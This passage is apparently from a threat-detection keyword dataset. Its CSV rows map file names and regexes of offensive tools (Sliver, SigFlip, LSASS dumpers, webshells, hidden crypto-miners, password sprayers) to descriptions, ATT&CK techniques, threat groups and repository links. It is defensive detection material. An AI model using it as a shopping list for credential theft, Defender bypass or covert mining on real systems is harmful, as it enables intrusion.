T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\Shoggoth.exe*",".{0,1000}\\Shoggoth\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\Shoggoth.pptx*",".{0,1000}\\Shoggoth\.pptx.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\Shoggoth.sln*",".{0,1000}\\Shoggoth\.sln.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\ShoggothEngine.cpp*",".{0,1000}\\ShoggothEngine\.cpp.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\SigFlip.exe*",".{0,1000}\\SigFlip\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*\SigFlip.exe*",".{0,1000}\\SigFlip\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\SignToolEx.cpp*",".{0,1000}\\SignToolEx\.cpp.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*\SignToolEx.sln*",".{0,1000}\\SignToolEx\.sln.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*\SignToolExDll*",".{0,1000}\\SignToolExDll.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*\sigthief.exe*",".{0,1000}\\sigthief\.exe.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*\Silent.7z*",".{0,1000}\\Silent\.7z.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*\SilentClean.exe*",".{0,1000}\\SilentClean\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*\SilentCryptoMiner\*",".{0,1000}\\SilentCryptoMiner\\.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*\SilentProcessExit.sln*",".{0,1000}\\SilentProcessExit\.sln.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*\SillyRAT\*.py",".{0,1000}\\SillyRAT\\.{0,1000}\.py","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\simple-backdoor.php*",".{0,1000}\\simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","0","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*\SimpleLoader.cpp*",".{0,1000}\\SimpleLoader\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\SimpleLoader.exe*",".{0,1000}\\SimpleLoader\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*\simpleXORencoder.c*",".{0,1000}\\simpleXORencoder\.c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\SingleDose.csproj*",".{0,1000}\\SingleDose\.csproj.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*\SingleDose.exe*",".{0,1000}\\SingleDose\.exe.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*\SingleDose.sln*",".{0,1000}\\SingleDose\.sln.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*\SingleDose-main.zip*",".{0,1000}\\SingleDose\-main\.zip.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*\sitadel.log*",".{0,1000}\\sitadel\.log.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*\slinky.py*",".{0,1000}\\slinky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\slip.py *",".{0,1000}\\slip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*\slip-main.zip",".{0,1000}\\slip\-main\.zip","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*\sliver.exe*",".{0,1000}\\sliver\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\sliver-client.exe*",".{0,1000}\\sliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\sliver-client_windows.exe*",".{0,1000}\\sliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\sliver-client_windows-386*.exe*",".{0,1000}\\sliver\-client_windows\-386.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\sliver-client_windows-amd64*.exe*",".{0,1000}\\sliver\-client_windows\-amd64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\sliver-client_windows-arm64*.exe*",".{0,1000}\\sliver\-client_windows\-arm64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\sliverpb.Exe*",".{0,1000}\\sliverpb\.Exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\SlowPathMITM.py*",".{0,1000}\\SlowPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\smartbrute\*",".{0,1000}\\smartbrute\\.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*\smartbrute-main*",".{0,1000}\\smartbrute\-main.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*\SMB_RPC\*.py",".{0,1000}\\SMB_RPC\\.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\smb_SCNotification.exe*",".{0,1000}\\smb_SCNotification\.exe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*\SMB_Staging.c*",".{0,1000}\\SMB_Staging\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\SMBGrab.pl*",".{0,1000}\\SMBGrab\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*\SMBHunt.pl*",".{0,1000}\\SMBHunt\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*\SMBList.pl*",".{0,1000}\\SMBList\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*\smbmap.py*",".{0,1000}\\smbmap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\smbrelayserver.py*",".{0,1000}\\smbrelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*\smbsr.db*",".{0,1000}\\smbsr\.db.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*\smbsr.log*",".{0,1000}\\smbsr\.log.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*\smbsr.py*",".{0,1000}\\smbsr\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*\smbsr_results.csv*",".{0,1000}\\smbsr_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*\Smeagol.log*",".{0,1000}\\Smeagol\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\smuggler.py*",".{0,1000}\\smuggler\.py.{0,1000}","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","245","46","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" "*\Snaffler.exe*",".{0,1000}\\Snaffler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\snaffler.py*",".{0,1000}\\snaffler\.py.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*\sniff.py*",".{0,1000}\\sniff\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\sniffers\sniffer.py*",".{0,1000}\\sniffers\\sniffer\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*\SOAPHound.csproj*",".{0,1000}\\SOAPHound\.csproj.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*\SOAPHound.exe*",".{0,1000}\\SOAPHound\.exe.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*\SOAPHound.sln*",".{0,1000}\\SOAPHound\.sln.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*\SOAPHound\Enums\*",".{0,1000}\\SOAPHound\\Enums\\.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" 